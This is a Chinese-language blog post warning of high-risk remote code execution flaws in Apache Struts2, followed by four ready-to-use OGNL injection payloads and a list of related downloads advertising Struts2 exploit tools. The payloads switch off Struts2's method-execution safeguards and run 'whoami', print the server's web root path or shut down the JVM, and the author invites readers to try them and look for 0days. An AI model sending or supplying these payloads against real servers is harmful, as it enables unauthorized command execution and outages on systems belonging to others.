`
wuxianjun
  • 浏览: 5714 次
  • 性别: Icon_minigender_1
  • 来自: 中国
社区版块
存档分类
最新评论

高危 struts2 远程执行代码漏洞

 
阅读更多
用struts2 的童鞋主意了,最近出了几个比较严重的安全漏洞,危害及大。没补丁的童鞋赶快补丁,服务器会被别人日了。
下面公布几个exp 有兴趣的童鞋可以去测试下,不懂的可以联系俺,共同探讨下。说不定还能发现0day.

15个漏洞及补丁自己去官网看:
https://cwiki.apache.org/confluence/display/WW/Security+Bulletins

exp1:
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1  



exp 2:
?class.classLoader.jarPath=(%23context%5b"xwork.MethodAccessor.denyMethodExecution"%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b"allowStaticMethodAccess"%5d%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]


exp3:
1${(%23_memberAccess["allowStaticMethodAccess"]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23k8out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23k8out.println(%23req.getRealPath("/")),%23k8out.close())}


exp4:
${%23context%5b"xwork.MethodAccessor.denyMethodExecution"%5d%3d new java.lang.Boolean(false)%2c %23_memberAccess%5b"allowStaticMethodAccess"%5d%3dtrue%2c %23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew java.io.InputStreamReader(%23a)%2c%23c%3dnew java.io.BufferedReader(%23b)%2c%23d%3dnew char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close()}

分享到:
评论

相关推荐

    struts2漏洞利用工具

    然而,Struts2在历史上曾出现过一系列的安全漏洞,其中一些是高危的,允许攻击者执行远程代码或控制系统。这个"Struts终极漏洞利用工具"显然旨在帮助安全研究人员和管理员检测和测试Struts2应用是否存在这些已知漏洞...

    struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017

    攻击者可以通过提交恶意的、可反序列化的对象,触发远程代码执行(RCE)。 接下来是s2-016漏洞(CVE-2016-1000031),这是2016年发现的一个高危漏洞,也与OGNL有关。此漏洞在于Struts2的...

    struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞

    2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞,漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值...

    struts1.3.15.1高危漏洞修复版ssh包

    在Struts 1.x版本中,存在一个名为CVE-2017-9791的安全漏洞,这是一个高危级别的远程代码执行漏洞,攻击者可以利用这个漏洞执行任意系统命令,对服务器安全构成严重威胁。SSH(Spring、Struts、Hibernate)是一种...

    关于Apache Struts 2软件存在高危漏洞的紧急通报003

    根据温州市网络与信息安全信息通报中心发布的紧急通报(2017年第3期),Apache Struts 2软件中存在一个远程命令执行高危漏洞。此漏洞被正式编号为CVE-2017-5638,它允许攻击者在不受影响的服务器上执行任意命令。受...

    Struts2漏洞检查工具

    然而,由于其广泛使用,Struts2框架在过去曾曝出多个安全漏洞,这些漏洞可能导致远程代码执行、数据泄露等严重后果。因此,针对Struts2的安全检查和漏洞利用工具变得至关重要。 首先,我们需要理解什么是Struts2...

    Struts2 (S2-016/S2-017)高危漏洞修复文件

    S2-016漏洞,全称为"Struts2 REST插件远程代码执行漏洞",主要影响Struts2的REST插件。该漏洞源于框架在处理XML内容时的不当输入验证。攻击者可以通过构造恶意的XML数据,使服务器执行任意代码,从而可能导致系统被...

    Struts2漏洞利用工具2016版 32.zip

    然而,如同任何复杂的软件系统一样,Struts2在它的生命周期中也暴露出了一些安全漏洞,其中一些可能导致严重的安全问题,比如远程代码执行(RCE)。 标题中的“Struts2漏洞利用工具2016版”很可能是指针对2016年...

    Struts2高危漏洞2.3.15.3

    在2017年,Struts2被发现存在一个名为CVE-2017-9791的高危漏洞,该漏洞可能导致远程代码执行(RCE),从而使攻击者能够控制服务器,窃取敏感信息,甚至导致服务瘫痪。针对这个漏洞,Struts2官方发布了修复版本2.3....

    S2-045 struts2-core-2.3.32.jar 相关jar包,测试可用

    近日,安恒信息安全研究院WEBIN实验室高级安全研究员Nike Zheng发现著名J2EE框架——Struts2存在远程代码执行的严重漏洞。目前Struts2官方已经确认漏洞(漏洞编号S2-045,CVE编号:cve-2017-5638),并定级为高危...

    CVE-2017-9805-POC.py s2-052.py 批量检测脚本

    Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行...

    struts2.3.32修补S2-045漏洞所有核心jar包及依赖的jar(含core包)

    S2-045漏洞是一个严重的远程代码执行(RCE)漏洞,存在于Apache Struts2的OGNL表达式语言中。这个漏洞允许攻击者通过精心构造的HTTP请求在服务器端执行任意代码,对系统安全构成极大威胁。Struts2.3.32的发布就是...

    Struts2漏洞利用工具2013版V1.2

    然而,如同任何复杂的软件系统一样,Struts2在其生命周期中也出现了一些安全漏洞,其中一些漏洞可能导致严重的后果,如远程代码执行(RCE)和数据泄露。 在2013年,Struts2曝光了一个高危漏洞,被称为CVE-2013-2251...

    Struts 2 全版本漏洞检测工具

    Struts 2漏洞检查工具2018版.exe文件是一个Windows操作系统下的可执行程序,用于在本地或者远程服务器上运行漏洞扫描。使用这类工具时,通常需要具备一定的系统访问权限,并且理解扫描结果,以便及时采取措施修复...

    struts2-048漏洞验证工具

    在S2-048漏洞中,当用户通过REST或JAX-RS接口发送恶意构造的HTTP请求时,Struts2框架会尝试解析包含恶意OGNL表达式的参数,这可能导致任意代码执行。具体来说,攻击者可以在请求中嵌入恶意OGNL表达式,使得服务器在...

    Struts2漏洞检查工具2017版

    这些漏洞通常涉及到Action配置、OGNL表达式注入等问题,可能导致远程代码执行(RCE)。 2. **深度分析**:对应用程序的配置文件、Action类、拦截器等进行深入分析,查找可能的安全弱点,不局限于公开披露的漏洞。 ...

    2.3.15.1 版本以前 struts2漏洞利用工具 和升级到2.3.15.1版本

    此外,还有S2-046(CVE-2017-9805),它也是一个远程代码执行漏洞,存在于Struts2的OGNL表达式中。OGNL(Object-Graph Navigation Language)是Struts2中的强大表达式语言,但未正确过滤可能导致攻击者通过特殊的...

    Struts终极漏洞利用工具及代码

    然而,随着时间的推移,Struts2在安全方面暴露出了一些重大问题,其中最著名的就是"Struts终极漏洞",这是一系列高危安全漏洞的统称。这些漏洞允许远程攻击者通过精心构造的HTTP请求来执行任意命令,对系统安全造成...

    Struts2漏洞利用工具2017版.exe

    2. **CVE-2016-1000031**:此漏洞允许攻击者通过特定的OGNL(Object-Graph Navigation Language)表达式绕过安全限制,可能导致远程代码执行。 3. **CVE-2013-2251**:这是一个著名的“秀逗漏洞”,攻击者可以通过...

Global site tag (gtag.js) - Google Analytics